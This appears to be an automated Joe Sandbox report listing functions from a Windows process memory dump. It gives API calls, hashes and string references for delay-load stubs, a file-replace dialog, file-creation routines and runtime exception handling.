Opcode ID: 61aa893d589da0330f1db68cc042b1abf2084e338683ada984d79e79029ca25b
Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
Opcode Fuzzy Hash: 61aa893d589da0330f1db68cc042b1abf2084e338683ada984d79e79029ca25b
Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472

Uniqueness

Uniqueness Score: -1.00%

Function 000FE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a2ad1a3d7a19edc122b747d16b02fa01e73d4c55184b69409b6ad7ec188781c7
Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
Opcode Fuzzy Hash: a2ad1a3d7a19edc122b747d16b02fa01e73d4c55184b69409b6ad7ec188781c7
Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472

Uniqueness

Uniqueness Score: -1.00%

Function 000FE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE3FC

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 30aa9d3f8e743536b6da2bcbdffb1a8e44e613c23e586de0b0fd66a4184344b2
Instruction ID: 6e694c17cd7b9fea3057b4d9896d85b4d0ba10e267ef84bb201b5f27e59b18d5
Opcode Fuzzy Hash: 30aa9d3f8e743536b6da2bcbdffb1a8e44e613c23e586de0b0fd66a4184344b2
Instruction Fuzzy Hash: 0CA012E11982C57C700C21009C0AC7B021CC1C0B60330442DF506808915C4008412472

Uniqueness

Uniqueness Score: -1.00%

Function 000FE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2480d2d2206bbd4db344d8037e2fa50497aadd6087c446a9fe4fa2785417c45a
Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
Opcode Fuzzy Hash: 2480d2d2206bbd4db344d8037e2fa50497aadd6087c446a9fe4fa2785417c45a
Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470

Uniqueness

Uniqueness Score: -1.00%

Function 000FE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fcd2867a6b3a0d6401f7e5dc0f476d00cc4b482d91ba4665760aa45a2b14e2eb
Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
Opcode Fuzzy Hash: fcd2867a6b3a0d6401f7e5dc0f476d00cc4b482d91ba4665760aa45a2b14e2eb
Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470

Uniqueness

Uniqueness Score: -1.00%

Function 000FE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d263afcb343334594e3df5b1bf65f285dba497a0d0e6407a79317b8a76836ac
Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
Opcode Fuzzy Hash: 4d263afcb343334594e3df5b1bf65f285dba497a0d0e6407a79317b8a76836ac
Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470

Uniqueness

Uniqueness Score: -1.00%

Function 000FE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE51F

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bae464d1386c5633b0177e996b955ba3a3d23f3ca3be3ac7798b0c8a8dc4ef59
Instruction ID: 4518f643465fbdd2268af2b95493cf15bac83b27e0bb35a1eb0aa05e76cae15b
Opcode Fuzzy Hash: bae464d1386c5633b0177e996b955ba3a3d23f3ca3be3ac7798b0c8a8dc4ef59
Instruction Fuzzy Hash: 17A012C15995857C700821009C02C7F010CC2C1F60330442DF506808926C400C412470

Uniqueness

Uniqueness Score: -1.00%

Function 000FE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE580

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 60d0b25eaded491e2de1844573bbf62c6f87efc4db9749d1bcfac4e9096494ad
Instruction ID: 8c2136a6709102cae784fc9b3fc5ddeaf498513ada7b1d37ffdf835cd8b914eb
Opcode Fuzzy Hash: 60d0b25eaded491e2de1844573bbf62c6f87efc4db9749d1bcfac4e9096494ad
Instruction Fuzzy Hash: DEA012C11D42883C700821609C02C7B050CC1C0F21330412DF505848916C4008412470

Uniqueness

Uniqueness Score: -1.00%

Function 000FE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE580

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c1bfc3aeb8d46a76a5973ea65be785545883e5b16fcc6959c775ae5caa4777ad
Instruction ID: 265c2c849dc50c92ed7829a11fd8b411cd0a306cb6bcc7b1c7b4429572f224d5
Opcode Fuzzy Hash: c1bfc3aeb8d46a76a5973ea65be785545883e5b16fcc6959c775ae5caa4777ad
Instruction Fuzzy Hash: 41A012C11982897C700821509C02C7B010CC1C0F60330442DF506848916C4008412470

Uniqueness

Uniqueness Score: -1.00%

Function 000FE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000FE580

Part of subcall function 000FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000FE8D0
Part of subcall function 000FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000FE8E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0493105f63a431fa8d2339cc3b20c47ae74f13d12ad00b042c51502af9ad5426
Instruction ID: 265c2c849dc50c92ed7829a11fd8b411cd0a306cb6bcc7b1c7b4429572f224d5
Opcode Fuzzy Hash: 0493105f63a431fa8d2339cc3b20c47ae74f13d12ad00b042c51502af9ad5426
Instruction Fuzzy Hash: 41A012C11982897C700821509C02C7B010CC1C0F60330442DF506848916C4008412470

Uniqueness

Uniqueness Score: -1.00%

Function 000E9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,000E903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 000E9F0C

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 542151784e0e7417e61ddd065a2502c67510760dcfd5e5f526e8658463b99e67
Instruction ID: 98683c4d16826fe6eeaa6e7d9ac3ec1e2cbcb161535bf0da3a5c27aa97bc1a96
Opcode Fuzzy Hash: 542151784e0e7417e61ddd065a2502c67510760dcfd5e5f526e8658463b99e67
Instruction Fuzzy Hash: B1A0113008000A8A8E002B30CA0808C3B20EB20BC030082A8A00ACA8A2CB22888B8A00

Uniqueness

Uniqueness Score: -1.00%

Function 000FAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,000FAE72,C:\Users\user\Desktop,00000000,0012946A,00000006), ref: 000FAC08

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 943cdb37ca30b28584797aed8a33957d85886b12992cea94dc217ebe87ef27e4
Instruction ID: f5821c182bb2b07d4b669b5907bd20500d03da108aedb81fb884496ba13611b0
Opcode Fuzzy Hash: 943cdb37ca30b28584797aed8a33957d85886b12992cea94dc217ebe87ef27e4
Instruction Fuzzy Hash: 5FA01130208200AB8A000B328F0AA8EBAAAAFA2B20F00C028A00080030CB30C8A0AA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000FC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 000FC2B1
EndDialog.USER32(?,00000006), ref: 000FC2C4
GetDlgItem.USER32(?,0000006C), ref: 000FC2E0
SetFocus.USER32(00000000), ref: 000FC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 000FC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 000FC358
FindFirstFileW.KERNEL32(?,?), ref: 000FC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000FC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 000FC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000FC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000FC3D4
_swprintf.LIBCMT ref: 000FC404

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 000FC417
FindClose.KERNEL32(00000000), ref: 000FC41E
_swprintf.LIBCMT ref: 000FC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 000FC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 000FC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 000FC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 000FC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000FC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000FC509
_swprintf.LIBCMT ref: 000FC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 000FC548
_swprintf.LIBCMT ref: 000FC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 000FC5AF

Part of subcall function 000FAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000FAF35
Part of subcall function 000FAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0011E72C,?,?), ref: 000FAF84

Strings

REPLACEFILEDLG, xrefs: 000FC247
%s %s, xrefs: 000FC469, 000FC58E
%s %s %s, xrefs: 000FC3F2, 000FC527

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 1a680cb679685fca06a99e9b1056eb44edb5f3320227269f0dc3f4b6c9691c56
Instruction ID: 94d5f4aedce292b8c2bf8c13b51ddbe7a1ae2362947df8950731e69ddfa44ec0
Opcode Fuzzy Hash: 1a680cb679685fca06a99e9b1056eb44edb5f3320227269f0dc3f4b6c9691c56
Instruction Fuzzy Hash: 5891A67214834CBFE261DBA0CD4AFFB77ECEB8AB00F004819B749D6491D775AA449762

Uniqueness

Uniqueness Score: -1.00%

Function 000E6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E6FAA
_wcslen.LIBCMT ref: 000E7013
_wcslen.LIBCMT ref: 000E7084

Part of subcall function 000E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000E7AAB
Part of subcall function 000E7A9C: GetLastError.KERNEL32 ref: 000E7AF1
Part of subcall function 000E7A9C: CloseHandle.KERNEL32(?), ref: 000E7B00

Part of subcall function 000EA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641,000000FF), ref: 000EA1F1
Part of subcall function 000EA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000E977F,?,?,000E95CF,?,?,?,?,?,00112641), ref: 000EA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 000E7139
CloseHandle.KERNEL32(00000000), ref: 000E7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000E7298

Part of subcall function 000E9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000E73BC,?,?,?,00000000), ref: 000E9DBC
Part of subcall function 000E9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 000E9E70

Part of subcall function 000E9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,000E95D6,?,?,?,?,?,00112641,000000FF), ref: 000E963B

Part of subcall function 000EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA501
Part of subcall function 000EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA532

Strings

SeRestorePrivilege, xrefs: 000E6FC2
UNC\, xrefs: 000E7051
\??\, xrefs: 000E702B
SeCreateSymbolicLinkPrivilege, xrefs: 000E6FCC

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: dc3649c53b1a4cad16693a4d9285833752e9661c59ebba470e71d06586af8ab7
Instruction ID: a0ccedbbf6ffade053c0a6cd3dc39bdf1f2c5b03bc29c241865b43e850049094
Opcode Fuzzy Hash: dc3649c53b1a4cad16693a4d9285833752e9661c59ebba470e71d06586af8ab7
Instruction Fuzzy Hash: 25C1E371904684AEDB25DB75DD81FEEB7A8AF18300F00455AFA5AF3182D770AB84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000FF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000FF844
IsDebuggerPresent.KERNEL32 ref: 000FF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000FF930
UnhandledExceptionFilter.KERNEL32(?), ref: 000FF93A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: aae49de60ecfa7ef38f53de0a0f3f934fe1969a81208de14af3bdfa6b371e1b4
Instruction ID: d0088040985fa3749278a2b421d3532d88b98ea18907331613af91f19073fd7e
Opcode Fuzzy Hash: aae49de60ecfa7ef38f53de0a0f3f934fe1969a81208de14af3bdfa6b371e1b4
Instruction Fuzzy Hash: 7B314975D0521DABDF21DFA4D9897DCBBF8AF08300F1041AAE50CAB250EB719B849F05

Uniqueness

Uniqueness Score: -1.00%

Function 000FE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,000FE5E8,0000001C,000FE7DD,00000000,?,?,?,?,?,?,?,000FE5E8,00000004,00141CEC,000FE86D), ref: 000FE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000FE5E8,00000004,00141CEC,000FE86D), ref: 000FE6CF

Strings

D, xrefs: 000FE6C3

